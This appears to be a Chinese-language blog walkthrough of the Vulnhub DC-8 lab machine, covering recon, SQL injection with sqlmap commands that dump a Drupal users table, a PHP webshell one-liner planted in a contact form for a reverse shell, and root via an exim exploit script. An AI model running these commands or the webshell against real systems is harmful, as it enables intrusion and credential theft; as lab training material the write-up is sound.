题外话：这是第一个我自己完全没有搜索过WP的靶机，可以说从信息收集到最终拿到Root权都没有怎么参照过别人的做法，可能是这个靶机简单了，也可能是自己水平提升起来了，加油！(ง •_•)ง

DC-8

基础信息收集

NMAP Result：

Nikto Result：

可以看到Nikto已经把Web App类型给找到了，Drupal 7，上Droopescan：

sql注入

本想一把梭，结果：

好像没有，打开网页看看：

象征性地测试一下SQL注入：

框架中存在sql注入的可能性我感觉其实很低，这里也只是顺手测试了一下，没想到居然真的存在注入。

sqlmap直接一把梭：

sqlmap -u http://192.168.145.141/?nid=1 --dbms MySQL --dbs

sqlmap -u http://192.168.145.141/?nid=1 --dbms MySQL -D d7db --tables

sqlmap -u http://192.168.145.141/?nid=1 --dbms MySQL -D d7db -T users --dump

于是，john暴力一下：

这个hash是属于用户john的。

反弹shell

登录Web APP，找找哪里能执行PHP代码，最终在Contact Us的WebForm的Form Setting中找到了：

一开始是直接写的<?php system($_GET[‘cmd’]); ?> ，报错system function not defined，就干脆换Kali内置的WebShell了。

然后用Kali的WebShell复制粘贴上去该Format为PHP Code，可以在这个目录下找到：

/usr/share/webshells/php

使用该shell注意修改这两个值：

在Contact Us随便填然后submit，成功拿到反弹shell：

提权

接下来就是提权了，看一下内核利用：

内核无法利用，查看sudo：

要密码，无法利用，看一下特殊权限文件：

其实也想过用最近的sudo漏洞来提权，但是：

从上到下都依次搜索了一下提权，最终确认exim可提权，exim版本：

把利用的shell脚本拷贝到靶机，然后下一步提权：

# Kali
sudo cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh
# Remote Machine
cd /tmp
scp [email protected]:/home/zhuhan/Vulnhub/DC-8/exp.sh exp.sh

给脚本赋权：

chmod 777 exp.sh

出现了问题，是换行符引起的，用sed把换行符清理一下：

sed -i 's/\r//' exp.sh

提权失败了，陷入沉思，看了下脚本，发现还有第二种用法：

用第二种方法看看：

成功提权！

拿到最终的Flag：

cat /root/*flag*

成就感满满~~(●ˇ∀ˇ●)